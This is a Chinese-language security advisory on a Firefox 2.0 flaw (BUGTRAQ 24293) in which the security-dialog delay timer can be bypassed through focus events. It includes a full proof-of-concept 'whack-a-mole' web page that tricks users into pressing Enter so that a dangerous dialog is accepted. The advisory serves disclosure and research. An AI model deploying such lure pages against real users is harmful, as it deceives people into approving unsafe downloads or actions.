发布日期：2007-06-04
更新日期：2007-06-05

受影响系统：

Mozilla Firefox 2.0

描述：

---

BUGTRAQ  ID: 24293

Mozilla Firefox是一款流行的开源WEB浏览器。

Mozilla Firefox在事件的处理上存在漏洞，远程攻击者可能利用此漏洞绕过浏览器的安全限制。

所有现代的浏览器都执行一种延迟定时器，这样在显示任何安全事件之前用户可以选择某些选项。在Firefox中，实现这种机制的方式是拦截未知对话事件以禁用所选控件，并拦截对话焦点事件以建立异步定时器，在指定的时间后会启用这些控件。但在某些情况下如果在指定时间段之前就删除了焦点，仍不会清除重新启用定时器，因此会将控件禁用两次，然后在隐藏对话时重新启用，导致用户可能会点击本应拦截的不安全内容。

<*来源：Michal Zalewski （lcamtuf@echelon.pl）
  
  链接：http://marc.info/?l=bugtraq&m=118097185402772&w=2
        http://lcamtuf.coredump.cx/ffclick2/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<script>
var mole_visible = 0;
var score = 0;

function handlekey(e) {
  var evt = window.event ? event : e;
  var cc = evt.charCode ? evt.charCode : evt.keyCode;
  if (cc == 13) {
    if (mole_visible) {
      document.getElementById("mole_body").innerHTML = "(splat!)";
      mole_visible = 0;
    } else {
      score--;
      document.getElementById("praise").innerHTML = "<font color=orange><b>Too late - mole gone!</b></font>";
    }
  }

}

function show_mole() {
  document.getElementById("mole").innerHTML="<p id=mole_body valign=middle style='position: relative; top: " + (140 - Math.random() * 280) + "px; left: " + (225 - Math.random() * 450) + "'><font size=+3 color=red><b>MOLE</b></font></p>";
  mole_visible = 1;
  setTimeout("hide_mole()",400);
  if (score == 6) setTimeout("window.close()",50);
}

function hide_mole() {
  document.getElementById("mole").innerHTML = "";
  if (mole_visible) {
    document.getElementById("praise").innerHTML = "<font color=red><b>You're not even trying!</b></font>";
    score--;
  } else {
    document.getElementById("praise").innerHTML = "<font color=blue><b>Nice shot!</b></font>";
    score++;
  }
  document.getElementById("score").innerHTML = score;
  setTimeout("show_mole()",1000);
}

function start_game() {
  setTimeout("show_mole()",2000);
}


</script>
<body style="width: 700px" onload="start_game()" onkeypress="handlekey(event)">
<font face="arial" size="+0">
<font size="+3" color="red"><b>The Ultimate Whack-a-Mole Challenge</b></font>
<hr size="1">
Don't wait! For your chance to win our grand prize
please hit <code>RETURN</code> every time you see a rodent! Score at least
10 points to qualify. While supplies last, void where prohibited.
<p>
<table style="border: 1px; border-style: solid; background-color: #f0fff0; width: 600px; height: 300px">
<tr>
<td align=center valign=middle id="mole">
</td>

</tr>
</table>
<table style="width: 600px">
<tr>
<td align=left>
<b>Score:</b> <span id="score" style="text-color: red">0</span><br>
</td>
<td align=right id=praise>
</td></tr></table>
<p>
NOTE: Do not switch to another window until the test is complete, or
else the demo will fail.

建议：

---

厂商补丁：

Mozilla
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mozilla.org/

浏览次数：2519
严重程度：0（网友投票）